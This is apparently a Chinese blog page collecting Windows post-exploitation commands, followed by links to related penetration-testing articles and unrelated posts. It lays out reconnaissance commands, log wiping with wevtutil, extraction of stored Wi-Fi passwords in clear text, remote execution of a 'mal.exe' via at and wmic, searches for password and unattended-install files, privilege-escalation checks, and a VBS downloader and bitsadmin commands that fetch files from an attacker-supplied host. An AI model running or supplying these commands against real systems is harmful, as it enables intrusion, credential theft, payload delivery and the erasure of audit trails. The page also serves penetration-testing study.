My

命令行下收集主机信息
使用wmic识别安装到系统中的补丁情况:  wmic qfe get description,installedOn
识别正在运行的服务:   sc query type= service
识别开机启动的程序,包括路径:  net start   wmic startup list full
ping探测存活主机   D:\>for /L %I in (100,1,254) DO @ping -w 1 -n 1 10.18.180.%I | findstr "TTL=" >> pinglive.txt
查看系统中网卡的IP地址和MAC地址:   D:\>wmic nicconfig get ipaddress,macaddress
查看当前系统是否有屏保保护,延迟是多少:   wmic desktop get screensaversecure,screensavertimeout
查看系统中开放的共享 :  D:\>wmic share get name,path  D:\>net share
查看系统中开启的日志 :   C:\>wmic nteventlog get path,filename,writeable
清除相关的日志(这里是全部清除)
  wevtutil cl "windows powershell"
  wevtutil cl "security"
  wevtutil cl "system"
查看系统中安装的软件以及版本:   C:\>wmic product get name,version
查看某个进程的详细信息 (路径,命令行参数等):   C:\>wmic process where name="chrome.exe" list full
终止一个进程
  D:\>wmic process where name="xshell.exe" call terminate
  D:\>ntsd -c q -p 进程的PID
显示系统中的曾经连接过的无线密码
  D:\>netsh wlan show profiles
  D:\>netsh wlan show profiles name="profiles的名字" key=clear
查看当前系统是否是VMWARE: C:\>wmic bios list full | find /i "vmware"

 远程执行命令

  at \\[remote host name or IP address] 12:00 cmd /c "C:\windows\temp\mal.exe"
  wmic /node:[IP address] /user:”[user name]” /password:”[password]” process call create “cmd /c c:\Windows\System32\net.exe user”

Freebuf引用

1.获取操作系统信息

识别操作系统名称及版本:

  中文系统:systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

  英文系统:systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

查看所有环境变量: SET
识别系统体系结构: echo %PROCESSOR_ARCHITECTURE%

2.获取网络信息

查看路由表信息:route print

查看ARP缓存信息: arp -A

查看防火墙规则:

netstat -ano
netsh firewall show config
netsh firewall show state 

3.应用程序及服务信息

查看计划任务: schtasks /QUERY /fo LIST /v

   中文系统调整GBK编码为437美国编码:chcp 437

   然后:schtasks /QUERY /fo LIST /v

查看服务进程ID:tasklist /SVC

查看安装驱动: driverquery

查看安装程序和版本信息(漏洞利用线索):wmic product list brief

查看服务、进程和启动程序信息:

  wmic service list brief
  wmic process list brief
  wmic startup list brief

查看.msi程序的执行权限:

  reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

查看是否设置有setuid和setgid:

  reg query HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits

查看安装补丁和时间信息:

  wmic qfe get Caption,Description,HotFixID,InstalledOn

查看特定漏洞补丁信息:

  wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

4.敏感数据和目录

查找密码文件或其它敏感文件:

  dir /b/s password.txt
  dir /b/s config.*
  findstr /si password *.xml *.ini *.txt
  findstr /si login *.xml *.ini *.txt

无人值守安装文件:

这些文件通常包含base64模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:

C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml

5.文件系统

可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下:

import os; os.system("cmd /c {command here}")

使用copy con命令创建ftp执行会话:

范例

>copy con ftp.bat #创建一个名为ftp.bat的批处理文件

ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出

> ftp.bat # 执行创建的文件

ftp> # 执行ftp命令

ftp> !{command} # e.g. - !dir or !ipconfig

使用copy con命令创建VBS脚本文件:

> copy con commandExec.vbs #创建VBS脚本文件

  Call WScript.CreateObject(, True) #VBS文件内容

> commandExec.vbs #执行脚本文件

检查文件夹可写状态: dir /a-r-d /s /b

6.一个有用的文件上传脚本
' downloadfile.vbs 

' Set your settings

strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"

strHDLocation = "c:\\{FILE_NAME.EXT}"

' Fetch the file

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false

objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then

Set objADOStream = CreateObject("ADODB.Stream")

objADOStream.Open

objADOStream.Type = 1 'adTypeBinary

objADOStream.Write objXMLHTTP.ResponseBody

objADOStream.Position = 0 'Set the stream position to the start

Set objFSO = Createobject("Scripting.FileSystemObject")

If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation

objADOStream.Close

Set objADOStream = Nothing

End if

Set objXMLHTTP = Nothing

该脚本是一个社区发布的,你可以以下这种方式运行它:

(1)cscript.exe downloadfile.vbs

(2)bitsadmin命令  如果目标系统是Win7及以上操作系统,可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程:
     bitsadmin /transfer job_name /download /priority priority URL local\path\file
     bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT} C:\path\download.exe
  如:bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

参考链接

  SourceURL:http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

  http://www.freebuf.com/articles/system/114731.html

  http://www.91ri.org/7894.html  Windows渗透与提权:技巧总结篇

Windows后渗透的更多相关文章

  1. kali linux之选择和修改exp与windows后渗透

    网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......) ...

  2. 渗透攻防工具篇-后渗透阶段的Meterpreter

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...

  3. Metasploit Framework(8)后渗透测试(一)

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...

  4. msf后渗透

    生成exe后门 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.131 lport=4444 -f exe -o 4444.e ...

  5. 火眼推出Windows免费渗透测试套件,包含140多款工具

    火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶级侦察与漏洞利用程序 ...

  6. EXP查询合集提权后渗透必备

    0x00 整理的一些后渗透提权需要用到的一些漏洞,后渗透提权的时候可以看一下目标机那些补丁没打,再进行下一步渗透提权. 0x01 CVE-2019-0803 [An elevation of priv ...

  7. 后渗透神器Cobalt Strike的安装

    0x01 简介 Cobalt Strike集成了端口转发.扫描多模式端口监听Windows exe木马,生成Windows dll(动态链接库)木马,生成java木马,生成office宏病毒,生成木马 ...

  8. Meterpreter后渗透之信息收集

    在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...

  9. 超实用!手把手教你如何用MSF进行后渗透测试!

    在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...

随机推荐

  1. Mybatis学习笔记(三) 之Dao开发

    使用Mybatis开发Dao,通常有两个方法,即原始Dao开发方法和Mapper接口开发方法,常用还是Mapper接口开发. SqlSession的使用范围 public class test1 { ...

  2. 驱动07.USB驱动程序

    1 了解USB识别的过程 eg:在Windows系统下的一个现象:把手机的USB设备接到PC 1. 右下角弹出"发现android phone" 2. 跳出一个对话框,提示你安装驱 ...

  3. openstack私有云布署实践【9.2 Glance镜像管理(办公网环境)】

    首先登录controller1创建glance数据库,并赋于远程和本地访问的权限.      mysql -u root -p   CREATE DATABASE glance; GRANT ALL ...

  4. 论JSON的重要性☞异步上传过程中data取多组值的方法

    异步上传取多组值一起post改变属性 如图: 看图说话

  5. springMVC Helloword 入门程序

    1  首先是在web.xml 中配置 <servlet> <servlet-name>SpringMVC</servlet-name> <servlet-cl ...

  6. web字体图标的使用

    今天给大家介绍一些web字体图标的下载和使用 一.WEB字体 1. 下载外部的字体图标的网站 font-awesome.com 2.CSS文件和font文件 3.html文档中使用外部字体 4.下载字 ...

  7. 消息队列 RabbitMQ 与 Spring 整合使用

    一.什么是 RabbitMQ RabbitMQ 是实现 AMQP(高级消息队列协议)的消息中间件的一种,最初起源于金融系统,用于在分布式系统中存储转发消息,在易用性.扩展性.高可用性等方面表现不俗.消 ...

  8. 利用Runtime给UITextView添加占位符(新方法)

     以前一直使用自定义UITextView通过通知中心来自定义placeHolder,最近看到这个方法,感觉更好 UITextView *textView = [[UITextView alloc]in ...

  9. C#中的委托到底是什么概念??

    委托,简单理解是这样的.比如您要管您的孩子,把孩子送进了幼儿园.OK.此时您就把您的孩子委托给了幼儿园.当幼儿园放学,将孩子交还给您的手中.则是委托的回调.当然我这里的例子是说异步委托调用.您也可以同 ...

  10. django模板系统基础

    模板系统基础Django模板是一个string文本,它用来分离一个文档的展现和数据 模板定义了placeholder和表示多种逻辑的tags来规定文档如何展现 通常模板用来输出HTML,但是Djang ...